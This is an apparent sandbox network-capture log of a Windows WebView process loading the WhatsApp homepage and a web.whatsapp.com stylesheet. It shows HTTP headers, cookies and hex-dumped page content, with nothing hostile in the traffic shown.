                                                                                                                                                                                                                1192.168.2.44974531.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC714OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: www.whatsapp.com
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"
                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Set-Cookie: wa_lang_pref=en; expires=Sun, 17-Mar-2024 16:46:06 GMT; Max-Age=604800; path=/; domain=.whatsapp.com; secure; SameSite=None
                                                                                                                                                                                                                Set-Cookie: wa_ul=bc17770c-78e3-4982-9381-9023d1db8504; expires=Sat, 08-Jun-2024 16:46:06 GMT; Max-Age=7776000; path=/; domain=.www.whatsapp.com; secure; httponly; SameSite=None
                                                                                                                                                                                                                Set-Cookie: wa_csrf=2uN016RqtMoaxc2Gn2y_gs; path=/; domain=.whatsapp.com; secure; httponly; SameSite=None
                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"
                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1951INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 62 6c 6f 62 3a 3b 73 63 72 69 70 74 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 2a 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 20 2a 2e 77 68 61 74 73 61 70 70 2e 6e 65 74 20 2a 2e 74 77 69 74 74 65 72 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 74 79 6c 65 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 2a 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 20 2a 2e 77 68 61 74 73 61 70 70 2e 6e 65 74 20 27 75 6e 73 61 66
                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src 'self' data: blob:;script-src 'self' data: blob: *.whatsapp.com *.whatsapp.net *.twitter.com *.facebook.com *.facebook.net 'unsafe-inline' 'unsafe-eval';style-src 'self' data: blob: *.whatsapp.com *.whatsapp.net 'unsaf
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC309INData Raw: 58 2d 46 42 2d 44 65 62 75 67 3a 20 4d 62 32 49 4e 31 66 63 2f 2b 42 36 58 50 65 6a 56 61 4c 6f 4e 35 79 41 2f 70 31 36 36 50 5a 78 30 53 43 33 7a 5a 5a 4e 66 4c 36 63 4b 49 63 77 67 78 47 35 34 66 79 52 70 73 31 4a 6c 65 62 4d 4f 33 47 43 49 36 4a 39 43 41 4c 42 6b 50 64 38 51 74 74 49 61 41 3d 3d 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 4d 61 72 20 32 30 32 34 20 31 36 3a 34 36 3a 30 36 20 47 4d 54 0d 0a 58 2d 46 42 2d 43 6f 6e 6e 65 63 74 69 6f 6e 2d 51 75 61 6c 69 74 79 3a 20 4d 4f 44 45 52 41 54 45 3b 20 71 3d 30 2e 33 2c 20 72 74 74 3d 31 39 38 2c 20 72 74 78 3d 30 2c 20 63 3d 31 34 2c 20 6d 73 73 3d 31 32 37 34 2c 20 74 62 77 3d 33 33 33 37 2c 20 74 70 3d 2d 31 2c 20 74 70 6c 3d 2d 31 2c 20 75 70 6c 61 74 3d 34 32 31 2c 20 75 6c 6c 61 74 3d
                                                                                                                                                                                                                Data Ascii: X-FB-Debug: Mb2IN1fc/+B6XPejVaLoN5yA/p166PZx0SC3zZZNfL6cKIcwgxG54fyRps1JlebMO3GCI6J9CALBkPd8QttIaA==Date: Sun, 10 Mar 2024 16:46:06 GMTX-FB-Connection-Quality: MODERATE; q=0.3, rtt=198, rtx=0, c=14, mss=1274, tbw=3337, tp=-1, tpl=-1, uplat=421, ullat=
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1191INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 57 6b 62 53 6a 54 4e 45 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69
                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="WkbSjTNE">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}wi
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 78 2d 64 65 66 61 75 6c 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 61 66 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 3f 6c 61 6e 67 3d 61 66 5f 5a 41 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 61 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 3f 6c 61 6e 67 3d 61 72 5f 41 52 22
                                                                                                                                                                                                                Data Ascii: ww.whatsapp.com" /><link rel="alternate" hreflang="x-default" href="https://www.whatsapp.com" /><link rel="alternate" hreflang="af" href="https://www.whatsapp.com?lang=af_ZA" /><link rel="alternate" hreflang="ar" href="https://www.whatsapp.com?lang=ar_AR"
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 67 3d 22 66 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 3f 6c 61 6e 67 3d 66 69 5f 46 49 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 66 69 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 3f 6c 61 6e 67 3d 74 6c 5f 50 48 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 66 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 3f 6c 61 6e 67 3d 66 72 5f 46 52 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 67 61 22 20 68 72 65 66
                                                                                                                                                                                                                Data Ascii: g="fi" href="https://www.whatsapp.com?lang=fi_FI" /><link rel="alternate" hreflang="fil" href="https://www.whatsapp.com?lang=tl_PH" /><link rel="alternate" hreflang="fr" href="https://www.whatsapp.com?lang=fr_FR" /><link rel="alternate" hreflang="ga" href
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 67 3d 6d 6b 5f 4d 4b 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 6d 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 3f 6c 61 6e 67 3d 6d 6c 5f 49 4e 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 6d 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 3f 6c 61 6e 67 3d 6d 72 5f 49 4e 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 6d 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 3f 6c 61 6e 67 3d 6d 73 5f 4d 59 22 20 2f 3e 3c
                                                                                                                                                                                                                Data Ascii: g=mk_MK" /><link rel="alternate" hreflang="ml" href="https://www.whatsapp.com?lang=ml_IN" /><link rel="alternate" hreflang="mr" href="https://www.whatsapp.com?lang=mr_IN" /><link rel="alternate" hreflang="ms" href="https://www.whatsapp.com?lang=ms_MY" /><
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1425INData Raw: 66 6c 61 6e 67 3d 22 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 3f 6c 61 6e 67 3d 74 65 5f 49 4e 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 74 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 3f 6c 61 6e 67 3d 74 68 5f 54 48 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 74 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 3f 6c 61 6e 67 3d 74 6c 5f 50 48 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 74 72 22 20 68
                                                                                                                                                                                                                Data Ascii: flang="te" href="https://www.whatsapp.com?lang=te_IN" /><link rel="alternate" hreflang="th" href="https://www.whatsapp.com?lang=th_TH" /><link rel="alternate" hreflang="tl" href="https://www.whatsapp.com?lang=tl_PH" /><link rel="alternate" hreflang="tr" h
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 52 2f 72 2f 79 38 2d 50 54 42 61 50 39 30 61 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 68 61 74 73 41 70 70 2e 63 6f 6d 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 55 73 65 20 57 68 61 74 73 41 70 70 20 4d 65 73 73 65 6e 67 65 72 20 74 6f 20 73 74 61 79 20 69 6e 20 74 6f 75 63 68 20 77 69 74 68 20 66 72 69 65 6e 64 73 20 61 6e 64 20 66 61 6d 69 6c 79 2e 20 57 68 61 74 73 41 70 70 20 69 73 20 66 72 65 65 20 61 6e 64 20 6f 66 66 65 72 73 20 73 69 6d 70 6c 65 2c 20 73 65 63 75 72 65 2c 20 72 65 6c 69 61 62 6c 65 20 6d 65 73 73 61 67 69 6e 67 20 61 6e 64 20 63 61 6c 6c
                                                                                                                                                                                                                Data Ascii: R/r/y8-PTBaP90a.png" /><meta property="og:site_name" content="WhatsApp.com" /><meta property="og:description" content="Use WhatsApp Messenger to stay in touch with friends and family. WhatsApp is free and offers simple, secure, reliable messaging and call
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 30 39 33 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 30 39 33 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 30 39 34 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 31 30 34 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 31 31 31 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 35 35 37 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32
                                                                                                                                                                                                                Data Ascii: 5":{"result":false,"hash":null},"20936":{"result":false,"hash":null},"20939":{"result":true,"hash":null},"20940":{"result":false,"hash":null},"21043":{"result":false,"hash":null},"21116":{"result":false,"hash":null},"25571":{"result":false,"hash":null},"2
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 35 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 36 36 36 39 22 2c 5b 22 44 61 74 61 53 74 6f 72 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 44 61 74 61 53 74 6f 72 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 53 65 72 76 65 72 4e 6f 6e 63 65 22 2c 5b 5d 2c 7b 22 53 65 72 76 65 72 4e 6f 6e 63 65 22 3a 22 41 64 62 55 50 44 55 63 77 6c 54 37 75 4f 35 49 67 51 38 75 37 74 22 7d 2c 31 34 31 5d 2c 5b 22 4b 53 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6b 69 6c 6c
                                                                                                                                                                                                                Data Ascii: "EventProfilerImpl"],{"__rc":["EventProfilerImpl",null]},-1],["cr:135",["RunBlue"],{"__rc":["RunBlue",null]},-1],["cr:6669",["DataStore"],{"__rc":["DataStore",null]},-1],["ServerNonce",[],{"ServerNonce":"AdbUPDUcwlT7uO5IgQ8u7t"},141],["KSConfig",[],{"kill


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                2192.168.2.44974731.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC682OUTGET /app-a89b2a183fe14aa356cb.css HTTP/1.1
                                                                                                                                                                                                                Host: web.whatsapp.com
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"
                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                Referer: https://web.whatsapp.com/
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gs
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC1983INHTTP/1.1 200 OK
                                                                                                                                                                                                                Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                                Vary: Accept-Encoding, Referer
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"
                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                                                                                                                                                cross-origin-opener-policy: unsafe-none;report-to="coop_report"
                                                                                                                                                                                                                Pragma: public
                                                                                                                                                                                                                Cache-Control: max-age=31449600
                                                                                                                                                                                                                Expires: Sun, 09 Mar 2025 16:46:08 +0000
                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC1768INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 3b 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 62 6c 6f 62 3a 3b 73 63 72 69 70 74 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 77 68 61 74 73 61 70 70 2e 6e 65 74 20 68 74 74 70 73 3a 2f 2f 6d 61 70 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 3b 73 74 79 6c 65 2d 73 72 63
                                                                                                                                                                                                                Data Ascii: content-security-policy: frame-ancestors 'self';content-security-policy: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC1500INData Raw: 2f 2a 21 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 32 34 20 57 68 61 74 73 41 70 70 20 49 6e 63 2e 20 41 6c 6c 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2e 20 2a 2f 0a 2e 73 65 6c 65 63 74 61 62 6c 65 2d 74 65 78 74 7b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 74 65 78 74 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 74 65 78 74 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 74 65 78 74 7d 2e 73 65 6c 65 63 74 2d 61 6c 6c 7b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 61 6c 6c 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 61 6c 6c 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 61 6c 6c 7d 68 74 6d 6c 5b 64 69 72 5d 20 3a 6e 6f 74 28 2e 73 65 6c 65 63 74 61 62 6c 65 2d 74 65 78 74 29 3e 3a 6e 6f 74 3e 3a 6e
                                                                                                                                                                                                                Data Ascii: /*! Copyright (c) 2024 WhatsApp Inc. All Rights Reserved. */.selectable-text{-webkit-user-select:text;-moz-user-select:text;user-select:text}.select-all{-webkit-user-select:all;-moz-user-select:all;user-select:all}html[dir] :not(.selectable-text)>:not>:n
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC1500INData Raw: 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 7d 68 74 6d 6c 5b 64 69 72 5d 20 2e 5f 32 6b 2d 36 33 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 35 29 7d 68 74 6d 6c 5b 64 69 72 3d 6c 74 72 5d 20 2e 5f 32 6b 2d 36 33 7b 6c 65 66 74 3a 30 7d 68 74 6d 6c 5b 64 69 72 3d 6c 74 72 5d 20 2e 5f 32 6b 2d 36 33 2c 68 74 6d 6c 5b 64 69 72 3d 72 74 6c 5d 20 2e 5f 32 6b 2d 36 33 7b 61 6e 69 6d 61 74 69 6f 6e 3a 5f 32 6b 2d 36 33 20 2e 35 73 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 6f 75 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 61 6c 74 65 72 6e 61 74 65 7d 68 74 6d 6c 5b 64 69 72 3d 72 74 6c 5d 20 2e 5f 32 6b 2d 36 33 7b 72 69 67 68 74 3a 30 7d 40 6b 65 79 66
                                                                                                                                                                                                                Data Ascii: solute;top:0}html[dir] ._2k-63{transform:scale(.95)}html[dir=ltr] ._2k-63{left:0}html[dir=ltr] ._2k-63,html[dir=rtl] ._2k-63{animation:_2k-63 .5s infinite;animation-timing-function:ease-out;animation-direction:alternate}html[dir=rtl] ._2k-63{right:0}@keyf
                                                                                                                                                                                                                2024-03-10 16:46:08 UTC1287INData Raw: 62 29 2c 2e 34 29 7d 68 74 6d 6c 5b 64 69 72 3d 6c 74 72 5d 20 2e 4b 30 66 76 71 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 32 70 78 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 76 61 72 28 2d 2d 70 72 69 6d 61 72 79 2d 72 67 62 29 2c 2e 32 29 7d 68 74 6d 6c 5b 64 69 72 3d 72 74 6c 5d 20 2e 4b 30 66 76 71 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 32 70 78 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 76 61 72 28 2d 2d 70 72 69 6d 61 72 79 2d 72 67 62 29 2c 2e 32 29 7d 68 74 6d 6c 5b 64 69 72 3d
                                                                                                                                                                                                                Data Ascii: b),.4)}html[dir=ltr] .K0fvq:first-child{padding-right:12px;margin-right:12px;border-right:1px solid rgba(var(--primary-rgb),.2)}html[dir=rtl] .K0fvq:first-child{padding-left:12px;margin-left:12px;border-left:1px solid rgba(var(--primary-rgb),.2)}html[dir=
